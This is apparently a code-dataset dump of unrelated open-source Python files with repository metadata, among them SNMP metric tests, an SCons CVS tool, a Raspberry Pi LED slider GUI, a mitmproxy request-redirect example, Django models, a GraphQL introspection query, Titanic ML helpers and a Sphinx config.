'fgFwPolByteCount']: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=firewall_tags, count=1 ) aggregator.assert_metric( 'snmp.{}.rate'.format(metric), metric_type=aggregator.RATE, tags=firewall_tags, count=1 ) # Firewall 6 firewall6_tags = common_tags + ['policy6_index:29'] for metric in ['fgFwPol6PktCount', 'fgFwPol6ByteCount']: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=firewall6_tags, count=1 ) aggregator.assert_metric( 'snmp.{}.rate'.format(metric), metric_type=aggregator.RATE, tags=firewall6_tags, count=1 ) aggregator.assert_all_metrics_covered() aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_metric_type=False) @pytest.mark.usefixtures("dd_environment") def test_netapp(aggregator): run_profile_check('netapp') profile_tags = [ 'snmp_profile:netapp', 'snmp_host:example-datacenter.company', ] common_tags = common.CHECK_TAGS + profile_tags common.assert_common_metrics(aggregator, common_tags) gauges = [ 'cfInterconnectStatus', 'miscCacheAge', 'ncHttpActiveCliConns', ] counts = [ 'extcache64Hits', ] for metric in gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in counts: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) snapvault_counts = [ 'svTotalFailures', ] snapvaults = [('5', '/vol/dir1', '5'), ('6', '/vol/dir3', '2'), ('18', '/vol/dir9', '4')] for metric in snapvault_counts: for index, destination, state in snapvaults: tags = [ 'index:{}'.format(index), 'destination:{}'.format(destination), 'state:{}'.format(state), ] + common_tags aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) snapmirrors = [('6', '1'), ('9', '5'), ('29', '1')] snapmirror_gauges = [ 'snapmirrorLag', ] snapmirror_counts = [ 'snapmirrorTotalFailures', ] for index, state in snapmirrors: tags = ['index:{}'.format(index), 'state:{}'.format(state)] + common_tags for metric in snapmirror_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) for metric in snapmirror_counts: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) filesystem_gauges = [ 'dfHighTotalKBytes', 'dfHighAvailKBytes', 'dfInodesUsed', 'dfInodesFree', ] filesystem_indexes = [ '1022', '1023', '1024', '1025', '1026', '1027', '1028', '1029', '1032', '1033', ] filesystems = ['/vol/dir{}'.format(n) for n in range(1, len(filesystem_indexes) + 1)] for metric in filesystem_gauges: for index, filesystem in zip(filesystem_indexes, filesystems): tags = ['index:{}'.format(index), 'filesystem:{}'.format(filesystem)] + common_tags aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) if_counts = [ 'ifHighInOctets', ] if_rates = [ 'ifHighInOctets.rate', ] interfaces = [ # Interface descriptions will be normalized in the backend, but we receive the raw DisplayString values here. ('6', 'netgear ifX300 v1'), ('7', 'junyper proto12 12.3'), ('23', 'malabar yz42 10.2020'), ] for index, descr in interfaces: tags = ['index:{}'.format(index), 'interface:{}'.format(descr)] + common_tags for metric in if_counts: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) for metric in if_rates: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1) aggregator.assert_metric('snmp.sysUpTimeInstance', metric_type=aggregator.GAUGE, tags=common_tags, count=1) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_cisco_catalyst(aggregator): run_profile_check('cisco-catalyst') common_tags = common.CHECK_TAGS + ['snmp_host:catalyst-6000.example', 'snmp_profile:cisco-catalyst'] sensors = [5, 9] for sensor in sensors: tags = ['sensor_id:{}'.format(sensor), 'sensor_type:10'] + common_tags aggregator.assert_metric('snmp.entSensorValue', metric_type=aggregator.GAUGE, tags=tags, count=1) interfaces = ["Gi1/0/{}".format(i) for i in [6, 10, 12, 18, 22, 25, 27]] for interface in interfaces: tags = ['interface:{}'.format(interface)] + common_tags for metric in CIE_METRICS: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) frus = [1001, 1010, 2001, 2010] for fru in frus: tags = ['fru:{}'.format(fru)] + common_tags for metric in FRU_METRICS: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) aggregator.assert_metric('snmp.sysUpTimeInstance', count=1) aggregator.assert_metric('snmp.devices_monitored', count=1) aggregator.assert_all_metrics_covered()
41.462159
120
0.672881
76a696faa434f1a385919c7aa42b0c62bf8e9a58
2,644
py
Python
scons-local-1.1.0/SCons/Tool/CVS.py
frew/simpleproto
393a7a059802152c888130c0a117fcc62d4fc8ab
[ "BSD-2-Clause", "MIT" ]
null
null
null
scons-local-1.1.0/SCons/Tool/CVS.py
frew/simpleproto
393a7a059802152c888130c0a117fcc62d4fc8ab
[ "BSD-2-Clause", "MIT" ]
null
null
null
scons-local-1.1.0/SCons/Tool/CVS.py
frew/simpleproto
393a7a059802152c888130c0a117fcc62d4fc8ab
[ "BSD-2-Clause", "MIT" ]
null
null
null
"""SCons.Tool.CVS.py Tool-specific initialization for CVS. There normally shouldn't be any need to import this module directly. It will usually be imported through the generic SCons.Tool.Tool() selection method. """ # # Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # __revision__ = "src/engine/SCons/Tool/CVS.py 3603 2008/10/10 05:46:45 scons" import SCons.Action import SCons.Builder import SCons.Util def generate(env): """Add a Builder factory function and construction variables for CVS to an Environment.""" def CVSFactory(repos, module='', env=env): """ """ # fail if repos is not an absolute path name? if module != '': # Don't use os.path.join() because the name we fetch might # be across a network and must use POSIX slashes as separators. module = module + '/' env['CVSCOM'] = '$CVS $CVSFLAGS co $CVSCOFLAGS -d ${TARGET.dir} $CVSMODULE${TARGET.posix}' act = SCons.Action.Action('$CVSCOM', '$CVSCOMSTR') return SCons.Builder.Builder(action = act, env = env, CVSREPOSITORY = repos, CVSMODULE = module) #setattr(env, 'CVS', CVSFactory) env.CVS = CVSFactory env['CVS'] = 'cvs' env['CVSFLAGS'] = SCons.Util.CLVar('-d $CVSREPOSITORY') env['CVSCOFLAGS'] = SCons.Util.CLVar('') env['CVSCOM'] = '$CVS $CVSFLAGS co $CVSCOFLAGS ${TARGET.posix}' def exists(env): return env.Detect('cvs')
38.882353
103
0.674357
f193a4793b5413eef85ecfb9fcbc48939954de51
2,449
py
Python
RGB_LED_Control.py
Linja82/Raspberry-Pi-RGB-LED-Control-w-GUI
295c58f9a126bf72b03e2d3d59c0747daff6e912
[ "MIT" ]
null
null
null
RGB_LED_Control.py
Linja82/Raspberry-Pi-RGB-LED-Control-w-GUI
295c58f9a126bf72b03e2d3d59c0747daff6e912
[ "MIT" ]
null
null
null
RGB_LED_Control.py
Linja82/Raspberry-Pi-RGB-LED-Control-w-GUI
295c58f9a126bf72b03e2d3d59c0747daff6e912
[ "MIT" ]
null
null
null
from tkinter import * import RPi.GPIO as GPIO import time ##### NOTES ##### # The common anode pin connects to the 3.3V rail # Duty cycle values need to be inverted because the LED is common anode # Higher duty cycle reduces the voltage difference between the GPIO pin and the 3.3V rail # Resistors: # Red: 200 Ω # Green: 100 Ω # Blue: 100 Ω colour_pins = [11, 15, 13] # Red, Green, Blue def setup(): # Initiates the GPIO pins and pwm global pwmR, pwmG, pwmB GPIO.setmode(GPIO.BOARD) for i in colour_pins: # Sets pin mode and state for all 3 LED pins GPIO.setup(i, GPIO.OUT) GPIO.output(i, GPIO.LOW) pwmR = GPIO.PWM(colour_pins[0], 8000) pwmG = GPIO.PWM(colour_pins[1], 8000) pwmB = GPIO.PWM(colour_pins[2], 8000) pwmR.start(0) pwmG.start(0) pwmB.start(0) def setColour(r_in, g_in, b_in): # 0 ~ 255 values r = round(((255 - r_in) / 255) * 100) g = round(((255 - g_in) / 255) * 100) b = round(((255 - b_in) / 255) * 100) pwmR.ChangeDutyCycle(r) print("Red " + str(r) + " / " + str(r_in)) pwmG.ChangeDutyCycle(g) print("Green " + str(g) + " / " + str(g_in)) pwmB.ChangeDutyCycle(b) print("Blue " + str(b) + " / " + str(b_in)) print("\n") def shutdown(): pwmR.stop() pwmG.stop() pwmB.stop() GPIO.cleanup() window.destroy() exit() # Program start setup() window = Tk() window.title("RGB LED Control") window.geometry("280x360") # Create the widgets red_label = Label(window, text="Red") red_slider = Scale(window, from_=255, to=0, length=300, resolution=1, orient=VERTICAL) green_label = Label(window, text="Green") green_slider = Scale(window, from_=255, to=0, length=300, resolution=1, orient=VERTICAL) blue_label = Label(window, text="Blue") blue_slider = Scale(window, from_=255, to=0, length=300, resolution=1, orient=VERTICAL) # Place the widgets on a grid red_label.grid(row=0, column=0, padx=(60, 0)) red_slider.grid(row=1, column=0, padx=(30, 0)) green_label.grid(row=0, column=1, padx=(25, 0)) green_slider.grid(row=1, column=1) blue_label.grid(row=0, column=2, padx=(26, 0)) blue_slider.grid(row=1, column=2) leave = Button(window, text="Exit", command = shutdown).grid(row=2, column=1, padx=(30, 0)) LOOP_ACTIVE = True while LOOP_ACTIVE: window.update() # Display colour here setColour(red_slider.get(), green_slider.get(), blue_slider.get()) time.sleep(0.5)
24.989796
91
0.648428
3a3ad300f5b6f7114ca10cd9739e425d90ef1196
659
py
Python
examples/redirect_requests.py
sebdraven/mitmproxy
6a31d3271219dffc9786f08e387ad5dc812fe86c
[ "MIT" ]
2
2015-05-10T15:07:44.000Z
2016-01-04T21:13:01.000Z
examples/redirect_requests.py
kmanna/mitmproxy
f850bdd8483907b297804ab0f8d07ff1cb456ff5
[ "MIT" ]
null
null
null
examples/redirect_requests.py
kmanna/mitmproxy
f850bdd8483907b297804ab0f8d07ff1cb456ff5
[ "MIT" ]
null
null
null
from libmproxy.flow import Response from netlib.odict import ODictCaseless """ This example shows two ways to redirect flows to other destinations. """ def request(context, flow): if flow.request.host.endswith("example.com"): resp = Response(flow.request, [1,1], 200, "OK", ODictCaseless([["Content-Type","text/html"]]), "helloworld", None) flow.request.reply(resp) if flow.request.host.endswith("example.org"): flow.request.host = "mitmproxy.org" flow.request.headers["Host"] = ["mitmproxy.org"]
32.95
70
0.561457
b2cdb79eaa0e2fb2bd5cf8b32803b2b2e0268f83
1,275
py
Python
authors/apps/articles/migrations/0003_auto_20180925_1142.py
andela/ah-leagueOfLegends
ebe3a4621a5baf36a9345d4b126ba73dc37acd1f
[ "BSD-3-Clause" ]
null
null
null
authors/apps/articles/migrations/0003_auto_20180925_1142.py
andela/ah-leagueOfLegends
ebe3a4621a5baf36a9345d4b126ba73dc37acd1f
[ "BSD-3-Clause" ]
43
2018-08-27T16:53:58.000Z
2022-03-11T23:28:24.000Z
authors/apps/articles/migrations/0003_auto_20180925_1142.py
andela/ah-leagueOfLegends
ebe3a4621a5baf36a9345d4b126ba73dc37acd1f
[ "BSD-3-Clause" ]
2
2018-10-30T10:30:35.000Z
2018-11-12T07:48:02.000Z
# Generated by Django 2.1 on 2018-09-25 11:42 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('articles', '0002_report'), ] operations = [ migrations.CreateModel( name='ArticleRating', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('note', models.TextField()), ('rating', models.IntegerField()), ('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='articlerating', to='articles.Article')), ('rater', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='articlesrating', to=settings.AUTH_USER_MODEL)), ], ), migrations.RemoveField( model_name='articleratings', name='article', ), migrations.RemoveField( model_name='articleratings', name='rater', ), migrations.DeleteModel( name='ArticleRatings', ), ]
33.552632
150
0.607843
c7299c637ea4dc17f7beac2b8418db19371ed43a
3,021
py
Python
src/graphql/utilities/get_introspection_query.py
KingDarBoja/graphql-core
22970e94f1016e813848fc0ab5d1e7ab9ad612e4
[ "MIT" ]
1
2021-07-27T20:47:34.000Z
2021-07-27T20:47:34.000Z
src/graphql/utilities/get_introspection_query.py
KingDarBoja/graphql-core
22970e94f1016e813848fc0ab5d1e7ab9ad612e4
[ "MIT" ]
null
null
null
src/graphql/utilities/get_introspection_query.py
KingDarBoja/graphql-core
22970e94f1016e813848fc0ab5d1e7ab9ad612e4
[ "MIT" ]
null
null
null
from textwrap import dedent __all__ = ["get_introspection_query"] def get_introspection_query( descriptions: bool = True, specified_by_url: bool = False, directive_is_repeatable: bool = False, schema_description: bool = False, ) -> str: """Get a query for introspection. Optionally, you can exclude descriptions, include specification URLs, include repeatability of directives, and specify whether to include the schema description as well. """ maybe_description = "description" if descriptions else "" maybe_specified_by_url = "specifiedByUrl" if specified_by_url else "" maybe_directive_is_repeatable = "isRepeatable" if directive_is_repeatable else "" maybe_schema_description = maybe_description if schema_description else "" return dedent( f""" query IntrospectionQuery {{ __schema {{ {maybe_schema_description} queryType {{ name }} mutationType {{ name }} subscriptionType {{ name }} types {{ ...FullType }} directives {{ name {maybe_description} {maybe_directive_is_repeatable} locations args {{ ...InputValue }} }} }} }} fragment FullType on __Type {{ kind name {maybe_description} {maybe_specified_by_url} fields(includeDeprecated: true) {{ name {maybe_description} args {{ ...InputValue }} type {{ ...TypeRef }} isDeprecated deprecationReason }} inputFields {{ ...InputValue }} interfaces {{ ...TypeRef }} enumValues(includeDeprecated: true) {{ name {maybe_description} isDeprecated deprecationReason }} possibleTypes {{ ...TypeRef }} }} fragment InputValue on __InputValue {{ name {maybe_description} type {{ ...TypeRef }} defaultValue }} fragment TypeRef on __Type {{ kind name ofType {{ kind name ofType {{ kind name ofType {{ kind name ofType {{ kind name ofType {{ kind name ofType {{ kind name ofType {{ kind name }} }} }} }} }} }} }} }} """ )
25.175
85
0.438265
6b84f803137196cc212dae9f55083afd5cfec7bd
265
py
Python
tests/conftest.py
cammeronm/trickster
b7e3d64f2c3b99e986f4fde59a05caa1c7cadac9
[ "MIT" ]
null
null
null
tests/conftest.py
cammeronm/trickster
b7e3d64f2c3b99e986f4fde59a05caa1c7cadac9
[ "MIT" ]
null
null
null
tests/conftest.py
cammeronm/trickster
b7e3d64f2c3b99e986f4fde59a05caa1c7cadac9
[ "MIT" ]
null
null
null
import pytest from trickster.api_app import ApiApp from trickster.config import Config @pytest.fixture def config(): return Config() @pytest.fixture def app(config): return ApiApp(config) @pytest.fixture def client(app): return app.test_client()
13.25
36
0.743396
4ba782ef9203a320ede7c1102479d5729fbaae73
7,878
py
Python
S01 - Bootcamp and Binary Classification/SLU16 - Data Sufficiency and Selection/utils.py
jtiagosg/batch3-students
5eb94bee46625881e9470da2b137aaa0f6cf7912
[ "MIT" ]
12
2019-07-06T09:06:17.000Z
2020-11-13T00:58:42.000Z
S01 - Bootcamp and Binary Classification/SLU16 - Data Sufficiency and Selection/utils.py
jtiagosg/batch3-students
5eb94bee46625881e9470da2b137aaa0f6cf7912
[ "MIT" ]
29
2019-07-01T14:19:49.000Z
2021-03-24T13:29:50.000Z
S01 - Bootcamp and Binary Classification/SLU16 - Data Sufficiency and Selection/utils.py
jtiagosg/batch3-students
5eb94bee46625881e9470da2b137aaa0f6cf7912
[ "MIT" ]
36
2019-07-05T15:53:35.000Z
2021-07-04T04:18:02.000Z
import pandas as pd import numpy as np import matplotlib.pyplot as plt from sklearn.model_selection import learning_curve from sklearn.model_selection import train_test_split from sklearn.tree import DecisionTreeClassifier from sklearn.linear_model import LogisticRegression from sklearn.preprocessing import OneHotEncoder, RobustScaler from sklearn.metrics import accuracy_score categoricals = [ 'PassengerId', 'Name', 'Ticket', 'Sex', 'Cabin', 'Embarked', ] # Here are a few functions that we will use to do our proof of concepts # around training and testing for kaggle submissions for the titanic # competition. # The reason that we need to have these functions they way they are # is to manage the preprocessing of the features the same for the # training and test set. Don't worry too much about exactly what's # going on in these functions right now but rather focus on the concepts # that are being covered after this in the notebook. def read_and_get_dummies(drop_columns=[]): # when working inside of functions, always call your dataframe # _df so that you know you're never using any from the outside! _df = pd.read_csv('data/titanic.csv') # now drop any columns that are specified as needing to be dropped for colname in drop_columns: _df = _df.drop(colname, axis=1) for colname in categoricals: if colname in drop_columns: continue _df[colname] = _df[colname].fillna('null').astype('category') # Split the factors and the target X, y = _df.drop('Survived', axis=1), _df['Survived'] # take special note of this call! X = pd.get_dummies(X, dummy_na=True).fillna(-1) return _df, X, y def encode_categoricals(drop_columns=[]): # when working inside of functions, always call your dataframe # _df so that you know you're never using any from the outside! _df = pd.read_csv('data/titanic.csv') # now drop any columns that are specified as needing to be dropped for colname in drop_columns: _df = _df.drop(colname, axis=1) for colname in categoricals: if colname in drop_columns: continue _df[colname] = pd.Categorical(_df[colname].fillna('null')).codes if 'Age' in _df.columns: _df['Age'] = _df['Age'].fillna(_df['Age'].mean()) # Split the factors and the target X, y = _df.drop('Survived', axis=1), _df['Survived'] return _df, X, y def train_and_test(drop_columns=[], max_depth=None, test_size=0.2, encode_cats=False): """ Train a decision tree and return the classifier, the X_train, and the original dataframe so that they can be used on the test set later on. """ if encode_cats: _df, X, y = encode_categoricals(drop_columns=drop_columns) else: _df, X, y = read_and_get_dummies(drop_columns=drop_columns) # Now let's get our train/test split X_train, X_test, y_train, y_test = train_test_split( X, y, random_state=1, test_size=test_size) clf = DecisionTreeClassifier(max_depth=max_depth, random_state=1) clf.fit(X_train, y_train) score = accuracy_score(y_test, clf.predict(X_test)) print('X_test accuracy {}'.format(score)) print('X_train shape: {}'.format(X_train.shape)) return X_train, _df, clf def train_and_test_logit(drop_columns=[], test_size=0.2): """ Train a logistic regressionand return the classifier, the X_train, and the original dataframe so that they can be used on the test set later on. Features are scaled with RobustScaler. Does not create dummies but rather encodes categoricals as integers. """ _df, X, y = encode_categoricals(drop_columns=drop_columns) X = pd.DataFrame(RobustScaler().fit_transform(X), columns=X.columns) # Now let's get our train/test split X_train, X_test, y_train, y_test = train_test_split( X, y, random_state=1, test_size=test_size) clf = LogisticRegression(random_state=1, solver='lbfgs', penalty='none') clf.fit(X_train, y_train) score = accuracy_score(y_test, clf.predict(X_test)) print('X_test accuracy {}'.format(score)) print('X_train shape: {}'.format(X_train.shape)) return X_train, _df, clf def produce_test_predictions(train_df, clf, drop_columns=[]): _df = pd.read_csv('data/titanic-test.csv') for colname in drop_columns: _df = _df.drop(colname, axis=1) for colname in categoricals: if colname in drop_columns: continue _df[colname] = _df[colname].fillna('null') _df[colname] = pd.Categorical( _df[colname], categories=train_df[colname].cat.categories ) X = pd.get_dummies(_df, dummy_na=True).fillna(-1) return pd.DataFrame({ 'PassengerId': pd.read_csv('data/titanic-test.csv').PassengerId, 'Survived': pd.Series(clf.predict(X)) }) def plot_learning_curve(estimator, title, X, y, ylim=None, cv=3, n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)): """ Generate a simple plot of the test and training learning curve. Parameters ---------- estimator : object type that implements the "fit" and "predict" methods An object of that type which is cloned for each validation. title : string Title for the chart. X : array-like, shape (n_samples, n_features) Training vector, where n_samples is the number of samples and n_features is the number of features. y : array-like, shape (n_samples) or (n_samples, n_features), optional Target relative to X for classification or regression; None for unsupervised learning. ylim : tuple, shape (ymin, ymax), optional Defines minimum and maximum yvalues plotted. cv : int, cross-validation generator or an iterable, optional Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 3-fold cross-validation, - integer, to specify the number of folds. - An object to be used as a cross-validation generator. - An iterable yielding train/test splits. For integer/None inputs, if ``y`` is binary or multiclass, :class:`StratifiedKFold` used. If the estimator is not a classifier or if ``y`` is neither binary nor multiclass, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validators that can be used here. n_jobs : integer, optional Number of jobs to run in parallel (default 1). """ plt.figure() plt.title(title) if ylim is not None: plt.ylim(*ylim) plt.xlabel("Training examples") plt.ylabel("Score") train_sizes, train_scores, test_scores = learning_curve( estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes) train_scores_mean = np.mean(train_scores, axis=1) train_scores_std = np.std(train_scores, axis=1) test_scores_mean = np.mean(test_scores, axis=1) test_scores_std = np.std(test_scores, axis=1) plt.grid() plt.fill_between(train_sizes, train_scores_mean - train_scores_std, train_scores_mean + train_scores_std, alpha=0.1, color="r") plt.fill_between(train_sizes, test_scores_mean - test_scores_std, test_scores_mean + test_scores_std, alpha=0.1, color="g") plt.plot(train_sizes, train_scores_mean, 'o-', color="r", label="Training score") plt.plot(train_sizes, test_scores_mean, 'o-', color="g", label="Test Set score") plt.legend(loc="best") return plt # from sklearn import tree # tree.export_graphviz(clf, out_file='tree.dot', feature_names=X_train.columns) # ! dot -Tpng tree.dot -o tree.png
35.486486
86
0.675679
a448a96869d2205cdfb4cdf8c9b5cdc800e32870
1,854
py
Python
openquake/hazardlib/tests/gsim/pezeshk_2011_test.py
gfzriesgos/shakyground-lfs
2caf67cc32e6800286eded2df1efb05973ccf41b
[ "BSD-3-Clause" ]
1
2019-08-01T00:28:24.000Z
2019-08-01T00:28:24.000Z
openquake/hazardlib/tests/gsim/pezeshk_2011_test.py
gfzriesgos/shakyground-lfs
2caf67cc32e6800286eded2df1efb05973ccf41b
[ "BSD-3-Clause" ]
4
2018-08-31T14:14:35.000Z
2021-10-11T12:53:13.000Z
openquake/hazardlib/tests/gsim/pezeshk_2011_test.py
gfzriesgos/shakyground-lfs
2caf67cc32e6800286eded2df1efb05973ccf41b
[ "BSD-3-Clause" ]
3
2018-08-31T14:11:00.000Z
2019-07-17T10:06:02.000Z
# -*- coding: utf-8 -*- # vim: tabstop=4 shiftwidth=4 softtabstop=4 # # Copyright (C) 2013-2018 GEM Foundation # # OpenQuake is free software: you can redistribute it and/or modify it # under the terms of the GNU Affero General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # OpenQuake is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with OpenQuake. If not, see <http://www.gnu.org/licenses/>. from openquake.hazardlib.gsim.pezeshk_2011 import (PezeshkEtAl2011, PezeshkEtAl2011NEHRPBC) from openquake.hazardlib.tests.gsim.utils import BaseGSIMTestCase class Pezeshk2011EtAlTestCase(BaseGSIMTestCase): GSIM_CLASS = PezeshkEtAl2011 # Test data were obtained from a tool given by the authors # The data of the values of the mean PGA and SA are in g's. def test_mean(self): self.check('PEZE11/PZ11_MEAN.csv', max_discrep_percentage=0.5) def test_std_total(self): self.check('PEZE11/PZ11_STD_TOTAL.csv', max_discrep_percentage=0.5) class Pezeshk2011NEHRPBCEtAlTestCase(BaseGSIMTestCase): GSIM_CLASS = PezeshkEtAl2011NEHRPBC # Test data generated by adjustment using Atkinson & Boore factors def test_mean(self): self.check('PEZE11/PZ11_NEHRPBC_MEAN.csv', max_discrep_percentage=0.1) def test_std_total(self): self.check('PEZE11/PZ11_NEHRPBC_STD_TOTAL.csv', max_discrep_percentage=0.1)
36.352941
74
0.70658
f954302ee30286eefa44a77cf8a43a2be480da2d
158
py
Python
src/Python/cvdrun.py
apoorva-25/Learning-Git
0b2676b18a8198355e6075fae28233cfedd4ee5e
[ "MIT" ]
null
null
null
src/Python/cvdrun.py
apoorva-25/Learning-Git
0b2676b18a8198355e6075fae28233cfedd4ee5e
[ "MIT" ]
2
2020-09-24T11:36:34.000Z
2020-09-30T14:17:53.000Z
src/Python/cvdrun.py
apoorva-25/Learning-Git
0b2676b18a8198355e6075fae28233cfedd4ee5e
[ "MIT" ]
5
2020-09-21T13:21:08.000Z
2021-10-03T17:10:01.000Z
t = int(input()) for i in range(t): a = [int(i) for i in input().split(" ")] val = (a[0] - a[2] + a[3])%a[1] if val: print("NO") else: print("YES")
15.8
41
0.487342
fe716e5e27839770bfdbce7c010bc27e2ac0cac3
767
py
Python
users/models.py
Ndundiro/Instagram-Clone
db4a73324fe88357894cb5ccc56570127f7cb0df
[ "MIT" ]
1
2020-04-27T16:13:53.000Z
2020-04-27T16:13:53.000Z
users/models.py
Ndundiro/Instagram-Clone
db4a73324fe88357894cb5ccc56570127f7cb0df
[ "MIT" ]
5
2020-06-05T23:42:26.000Z
2022-02-10T13:17:46.000Z
users/models.py
Ndundiro/Instagram-Clone
db4a73324fe88357894cb5ccc56570127f7cb0df
[ "MIT" ]
null
null
null
from django.db import models from django.contrib.auth.models import User from PIL import Image class Profile(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE) bio = models.CharField(max_length=250, default="Hey there,am on Insta", blank=True) image = models.ImageField(default='default.jpg', upload_to='profile_pics') def save_profile(self): self.save() def __str__(self): return f'{self.user.username} Profile' def save(self, *args, **kwargs): super().save(*args, **kwargs) img = Image.open(self.image.path) if img.height > 300 or img.width > 300: output_size = (300, 300) img.thumbnail(output_size) img.save(self.image.path)
22.558824
87
0.647979
f30b0011e9a27c1dd89bd7d67f967247038adeb7
9,256
py
Python
docs/conf.py
mycarta/bruges
4b7dd42e96d477ffaaedd9134f9f7b7b60dd7123
[ "Apache-2.0" ]
209
2015-07-16T18:23:42.000Z
2022-02-27T02:59:46.000Z
docs/conf.py
mycarta/bruges
4b7dd42e96d477ffaaedd9134f9f7b7b60dd7123
[ "Apache-2.0" ]
74
2015-07-12T16:12:01.000Z
2022-02-22T14:27:26.000Z
docs/conf.py
mycarta/bruges
4b7dd42e96d477ffaaedd9134f9f7b7b60dd7123
[ "Apache-2.0" ]
112
2015-08-07T14:12:11.000Z
2022-02-10T14:12:50.000Z
# -*- coding: utf-8 -*- # # bruges documentation build configuration file, created by # sphinx-quickstart on Thu Dec 12 16:14:28 2013. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import re import sys import os import sphinx_rtd_theme import bruges # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath('../bruges')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinxcontrib.apidoc', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.mathjax', 'sphinx.ext.viewcode', 'sphinx.ext.napoleon', 'matplotlib.sphinxext.plot_directive', ] # Autosummary pages will be generated by sphinx-autogen. Otherwise, the # imported members won't be documented. apidoc_module_dir = '../bruges' apidoc_excluded_paths = ['tests'] apidoc_toc_file = 'api_toc' apidoc_separate_modules = True # Matplotlib Plot Directive plot_include_source = True plot_pre_code = "import bruges\nimport numpy as np\nimport matplotlib.pyplot as plt\n" # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'bruges' copyright = u'2018, Agile Scientific' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # verstr = 'unknown' VERSIONFILE = "../bruges/_version.py" with open(VERSIONFILE, "r")as f: verstrline = f.read().strip() pattern = re.compile(r"__version__ = ['\"](.*)['\"]") mo = pattern.search(verstrline) if mo: verstr = mo.group(1) print("Version "+verstr) else: raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,)) # The short X.Y version. version = verstr[:3] # The full version, including alpha/beta/rc tags. release = verstr # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build'] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. #keep_warnings = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. 